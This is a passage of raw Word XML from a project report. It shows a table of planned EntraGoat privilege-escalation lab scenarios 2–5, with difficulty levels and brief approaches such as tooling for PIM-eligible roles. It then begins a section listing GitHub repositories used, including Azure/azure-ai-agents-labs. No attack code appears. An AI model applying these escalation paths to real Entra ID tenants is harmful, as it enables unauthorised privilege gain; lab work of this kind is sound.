          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F887BB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc243301437"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. Future Work — Scenarios 2–5 (Planned)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="307BEC0C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The remaining four EntraGoat scenarios were not attempted in this round and are proposed as a follow-up task:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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500"/>
        <w:gridCol w:w="3600"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="3600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="67DC27B7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D1B5D68" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DDB187A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1946D4EB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D62F19E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Planned Approach</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="69497126" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03EC9836" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26980558" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Graph Me the Crown (and Role)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3111BD83" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Beginner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10A01B71" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Manual enumeration first, then extend entra_agent.py tooling as needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="4C7BE474" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4186BA5D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68A8496A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Group MemberShipwreck — Sailed into Admin Waters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B155A3A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Beginner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D331A12" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Likely extends group-membership/ownership tooling already built</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="67AD4340" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47F80DA8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1230C5DE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I (Eligibly) Own That</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74239556" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Intermediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1424ED38" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Likely requires a new tool for PIM-eligible (not active) role assignments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="09D31473" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CF9DA25" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1832ACDD" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Department of Escalations – AU Ready for This?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B1E51A8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="052F7CCA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Likely requires Administrative-Unit-scoped role checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01C422B3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73D2DD" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc243301438"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10. GitHub Repositories Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="626D5E13" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two external GitHub repositories were cloned and used over the course of this project, each serving a distinct stage. This section documents what each repository is, what it contains out of the box, what was used from it as-is, and what the project added on top.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BEDE10" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc243301439"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.1 Azure/azure-ai-agents-labs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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2400"/>
        <w:gridCol w:w="7100"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="620025B5"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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D59D983" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AFA5E4B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="4C07DDC4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AB36F04" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10B6B343" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>github.com/Azure/azure-ai-agents-labs — Microsoft's official hands-on lab repository for the “Develop AI Agents on Azure” learning path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="329EAF34" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
